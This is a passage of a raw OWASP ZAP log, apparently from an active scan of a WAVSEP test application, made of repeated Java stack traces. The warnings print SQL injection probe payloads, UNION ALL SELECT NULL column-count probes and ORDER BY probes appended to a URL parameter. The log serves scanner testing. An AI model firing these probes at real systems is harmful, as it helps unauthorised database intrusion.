org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679926 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679927 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679928 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679928 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679929 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679930 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679931 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679932 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679933 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679934 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679935 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679936 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 2388-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 2388-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679936 [ZAP-ActiveScanner-0] WARN 